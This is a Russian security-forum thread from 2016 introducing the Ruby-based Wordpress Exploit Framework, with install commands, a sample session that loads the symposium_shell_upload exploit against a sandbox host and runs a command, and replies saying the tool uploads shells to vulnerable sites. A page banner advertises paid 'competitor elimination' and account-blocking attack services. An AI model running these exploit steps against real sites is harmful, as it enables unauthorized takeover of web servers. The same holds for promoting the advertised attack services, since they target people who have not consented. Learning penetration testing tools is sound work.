Wordpress Exploit Framework

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
Wordpress Exploit Framework

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

31.12.2016, 03:35

Vander

Новичок

Регистрация: 03.11.2010

Сообщений: 5

С нами: 8170166

Репутация: 0

Приветствую! Недавно в сети попался любопытный фреймворк для проведения тестирования на проникновение в отношении Wordpress. В этой публикации, я хочу вас с ним ознакомить.

Называется он Wordpress Exploit Framework.

Написан инструмент на Ruby, включает в себя возможности для разработки собственных модулей и оказывает помощь в проведении пентеста Wordpress систем и сайтов.

Давайте приступим к установке фреймворка:

> git clonehttps://github.com/rastating/wordpress-exploit-framework

> cd wordpress-exploit-framework/

Для решения возникших в ходе установки проблем, советую посетить страницу разработчиков на github => https://github.com/rastating/wordpress-exploit-framework

Запустим фреймворк:

> ./wpxf.rb

Загрузка модуля в фреймворке позволит вам установить параметры с набором команд и просматривать информацию о модуле, используя команды фреймворка.

Ниже приведен пример того, как можно было бы загрузить symposium_shell_upload эксплойт-модуль, установить модуль и тип полезной нагрузки, затем выбрать необходимые параметры и запустить эксплойт против цели.

> wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #

> wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

> wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

> wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #

> wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

> wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...

[-] Uploading the payload...

[-] Executing the payload...

[+] Result: Hello, world!

[+] Execution finished successfully

Команда:

> help

Покажет описание внутренних команд фреймворка:

Повторюсь, всю необходимую информацию о структуре фреймворка, решении возникших проблем и получении сведений о лицензии смотрим на странице разработчиков на github.

Спасибо за внимание.

𝕏 Twitter Reddit Telegram Копировать ссылку

31.12.2016, 16:42

ghostphisher

Новичок

Регистрация: 07.12.2016

Сообщений: 0

С нами: 4963406

Репутация: 0

Если верно понял, то данный фрейм стартует после получения данных тем же wpsan. Основная задача - заливка shell на уязвимую систему.

31.12.2016, 21:12

Dosia

Участник форума

Регистрация: 05.06.2009

Сообщений: 127

С нами: 8912059

Репутация: 249

А перебирать уязвимости в данном фрейме возможно?

31.12.2016, 21:49

Vander

Новичок

Регистрация: 03.11.2010

Сообщений: 5

С нами: 8170166

Репутация: 0

Цитата:

Dosia сказал(а):

А перебирать уязвимости в данном фрейме возможно?

Можно выбрать конкретный модуль, для конкретного случая.

01.01.2017, 23:22

ghostphisher

Новичок

Регистрация: 07.12.2016

Сообщений: 0

С нами: 4963406

Репутация: 0

Цитата:

kservice сказал(а):

Подскажите, а есть что-нибудь посвежее для поиска уязвимостей в Wordpress, WPScan давно не обновляется же?

обновляется регулярно. Обратите внимание на гит хаб (ниже)
https://github.com/wpscanteam/wpscan
Если не нравится wpscan, есть другие owasp-zap, w3af, nikto, skiphish, vega и т.д. Но wpscan не тратит много времени на поиск лишнего - он четко идет по заданному алгоритму, что помогает сократить время поиска уязвимости.
[doublepost=1483298540,1483296652][/doublepost]

Цитата:

Dosia сказал(а):

А перебирать уязвимости в данном фрейме возможно?

Это не сканер, это для эксплуатции уязвимостей найденных другими средствами.